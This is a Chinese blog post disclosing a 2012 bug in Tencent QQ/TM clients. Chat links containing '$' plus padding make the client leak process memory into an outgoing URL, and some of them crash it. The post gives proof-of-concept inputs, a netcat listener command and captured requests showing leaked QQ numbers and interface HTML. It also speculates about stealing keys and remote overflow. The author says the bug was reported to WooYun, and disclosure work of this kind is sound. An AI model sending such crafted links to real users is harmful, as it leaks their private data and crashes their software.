腾讯 QQ、TM 远程读取内存数据漏洞、可导致远程溢出、拒绝服务攻击
腾讯 QQ、TM 聊天窗口远程读取对方进程内存数据漏洞、可导致远程溢出、拒绝服务攻击
漏洞描述:
这个我也不知道该下个什么定义、叫个什么名字好,暂且叫这个名字吧……
这个漏洞挺狗血的,发现过程也很巧合。
话说本站部分连接被伟大的GFW屏蔽了,所以在早上的时候,我把链接统一改成了一个很猥琐的格式……
例如:https://lcx.cc/?$=1910,(因为存在一些兼容问题,现在已经改成其他的了……)
然后,下午的时候,在群里发了链接,然后紧接着很多人反映QQ崩溃、或是无法访问!如下图:
然后我很好奇,于是乎手动检查了下,发现了个奇怪的问题,如下图:
很明显,打开的 Url 地址完全错误!并且后边多了一串奇怪的字符……
这顿时勾起了我的兴趣,于是乎把玩了一番,得出了如下结论……
漏洞测试:
测试环境:TM2009 Beta3.2 + IE9 + Windows 7 旗舰版 32 位
实际上后来得出来的结论与测试环境没什么联系,完全是 QQ、TM 软件内部数据处理问题,QQ 以及 TM 均可以利用成功,更有一些版本的QQ直接崩溃!!
下边说测试方法,准备工具:准备企鹅(QQ号)两头,NC 或其他能做临时 Web 服务器的东西……
执行:nc -l -p 80,你懂的……
然后打开两个聊天窗口,使用其中一个发送以下字符串:
http://192.168.1.2/$0000
然后再另一个接收的聊天窗口打开该 Url(其实双方窗口都可以打开该地址,都会触发漏洞)
你会惊奇的发现:
GET /root@lcx.cc%3E HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Host: 192.168.1.2 Connection: Keep-Alive
Url 地址居然变成了:http://192.168.1.2/root@lcx.cc%3E,Holy, Shit!
后边的:root@lcx.cc> 是神吗????(后来得出结论,这是对方的QQ号……)
不明白中,好吧,继续测试:
http://192.168.1.2/$1,返回结果:
GET /para%E8%A3%9C%E2%88%A5 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Host: 192.168.1.2 Connection: Keep-Alive
para%E8%A3%9C%E2%88%A5 这又是个啥??好吧,继续:
http://192.168.1.2/$000000000000000000000000000000000000000000000000000000000000000000000000000000000000
返回:
GET /7620ACE1-9C90-4E6A-9571-FE57A6A6DE69%3E HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Host: 192.168.1.2 Connection: Keep-Alive
7620ACE1-9C90-4E6A-9571-FE57A6A6DE69>,Yoooooooooooooooooooooo~ What The Fuck!
继续:
http://192.168.1.2/$000
http://192.168.1.2/$=000
http://192.168.1.2/$=00
返回:
哦呵呵呵呵呵呵,目测企鹅已经内部混乱了,我们继续,屌不炸,誓不罢休,哈哈哈哈……
http://192.168.1.2/$1111111100000000,返回:/link%3E,Url 解码为:/link>,是不是有点像Html标签?而且貌似还是超链接标签?继续……
http://192.168.1.2/$%E5%B1%8C%E7%82%B8%EF%BC%81,返回:
platform:CF_Only_Open_Safe_URL,越来越接近真相了哦,亲~
http://192.168.1.2/$%01%02%03%04%04%05%06%07%08%08%08%08%08%08%08%08%08%08%08%08%08%08
GET /%DF%8FPYD%DF%8F/hL%DF%8F%E7%8C%80%E7%90%80T%DF%8F%E6%A0%80%E6%BC%80/%DF%8F% E4%8C%80%E7%94%80d%DF%8F%E6%A0%80%E6%A4%80l%DF%8F%E7%8C%80%E6%94%80t%DF%8F%E2%BC %80%EF%BF%BD%7C%DF%8F%0Cs%C2%84%DF%8FTi%C2%8C%DF%8F HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Host: 192.168.1.2 Connection: Keep-Alive
这次企鹅射了好大一段哦,是什么呢,稍后解释,继续蹂躏企鹅……
http://192.168.1.2/$0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
猜猜返回了什么?Look:
http://192.168.1.2/tr%20bkIndex=1%20bgColor=#fbfafa%20id=itemId_32%20onclick=SetCurSel(this)%20ondblclick%20='OnDbClickItem(this)'%20dCount=0><td><table%20cellspacing='0'%20cellpadding='0'><tr><td%20width='183'><object%20classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119'%20class=imgHead><param%20name='src'%20value='platformdata:Head\1.png'></object>306797777</td><td%20width='183'>306797777<td>2012/3/11%2010:47:52</td></tr></table></td></tr>
Url 解码后:
http://192.168.1.2/tr bkIndex=1 bgColor=#fbfafa id=itemId_32 onclick=SetCurSel(this) ondblclick ='OnDbClickItem(this)' dCount=0><td><table cellspacing='0' cellpadding='0'><tr><td width='183'><object classid='clsid:87AF538B-F052-4A0B-BAE0-E686AD921119' class=imgHead><param name='src' value='platformdata:Head\1.png'></object>306797777</td><td width='183'>306797777<td>2012/3/11 10:47:52</td></tr></table></td></tr>
哈哈哈哈哈,企鹅聊天框的原始 Html 代码!!!(企鹅的聊天框是 Html 构架的)
企鹅快爆了,继续……
http://192.168.1.2/$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
http://192.168.1.2/$8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888880
返回:
http://192.168.1.2/items%3E%3Citem%20title=%22一个月未登录%22%20tips=%22该分组中一个月未登录好友%22%20value=%2231%22%20/%3E%3Citem%20title=%22三个月未登录%22%20tips=%22该分组中三个月未登录好友%22%20value=%2291%22%20/%3E%3Citem%20title=%22半年未登录%22%20tips=%22该分组中半年未登录好友%22%20value=%22184%22%20/%3E%3C/items%3E???
Url 解码后:
items><item title="一个月未登录" tips="该分组中一个月未登录好友" value="31" /><item title="三个月未登录" tips="该分组中三个月未登录好友" value="91" /><item title="半年未登录" tips="该分组中半年未登录好友" value="184" /></items>???
呵呵,这是神马数据???
返回数据:
http://192.168.1.2//A%3E%3C/font%3E%3Cfont%20style=%22font-size:20pt;font-family:'微软雅黑','MS%20Sans%20Serif',sans-serif;%22%20color='800040'%3E%3Cbr%3E%3Cbr%3E打开该链接……%3C/font%3E
Url 解码后:
http://192.168.1.2//A></font><font style="font-size:20pt;font-family:'微软雅黑','MS Sans Serif',sans-serif;" color='800040'><br><br>打开该链接……</font>
哈哈哈哈,腾讯打开连接那个框框的 Html 源码……
呵呵,更卧槽的是,随后,企鹅华丽的一声爆了,哦也……
重启QQ后,再次执行 2048 字节的数字 8:
GET /Canvas%3E%3Cbackground%3E%3CTexture%20colorize=%22true%22%20file=%22com.ten cent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png%22%20drawMode=%229Grid%2 2/%3E%3C/background%3E%3CTexture%20file=%22com.tencent.qzoneres:Qzone_TipFrame_Q zoneTipBack_clientBkg_hightlight.png%22%20Canvas.autoHeight=%22true%22%20Canvas. autoWidth=%22true%22%20Canvas.anchor=%22RIGHTCENTER%22%20Canvas.margin=%220,0,-5 ,-13%22/%3E%3C/Canvas%3E HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Host: 192.168.1.2 Connection: Keep-Alive
/Canvas><background><Texture colorize="true" file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg.png" drawMode="9Grid"/></background><Texture file="com.tencent.qzoneres:Qzone_TipFrame_QzoneTipBack_clientBkg_hightlight.png" Canvas.autoHeight="true" Canvas.autoWidth="true" Canvas.anchor="RIGHTCENTER" Canvas.margin="0,0,-5,-13"/></Canvas>
呵呵,腾讯内存泄露了……
不测试了,以此类推,很多的……
漏洞成因:
本人不是逆向狂牛,所以具体原因不明中……
但是,目测是腾讯在打开URL的时候,处理字符串问题,在碰到特殊符号“$”(美元符号)的时候,会产生计算错误,具体怎么产生的,目前不得而知。
但是结果可以知道,字符串长度计算错误,导致取数据的时候内存“错位”,把一块不相干的内存读取出来,并组成 Url,然后调用默认浏览器打开……
于是乎,就产生了这个蛋疼的漏洞,由于错误的内存读取操作很危险,所以很容易崩溃……
然后你就可以远程拒绝服务了……
可惜的是,该漏洞读取的内存位置,貌似不可控,反正很难定位,但是有部分字符串却是固定的读取位置。
测试的时候,有时候是对方昵称、QQ,有时候是聊天记录,有时候是群里某个QQ号,有时候是乱码(某个内存位置的无意义数据)……
在测试中,貌似只有这一个特殊符号生效,其他特殊符号均正常。
在该符号后边可以跟任何数据,随便什么,反正是填充位置的,让腾讯计算错误,越大越好,目测以数字为佳,字母或其他字符有时候无效。
利用方案:
可以远程读取对方进程内存,你只需要架一个简易Web服务器,能监听80端口即可,随便什么东西都行……
目前只能乱读一气,期待逆向大牛,如果可以精确控制读取位置,那么读取对方内存中的密匙指日可待了,你懂的……
而且本漏洞,貌似可以覆盖部分内存,所以,可能导致远程溢出……
就这样了,Fuck Gov……
已提交至乌云:
http://www.wooyun.org/bugs/wooyun-2010-05420/trace/af7f56ec622d95a4061760123db346ba
http://www.wooyun.org/bugs/wooyun-2012-05420
留言评论(旧系统):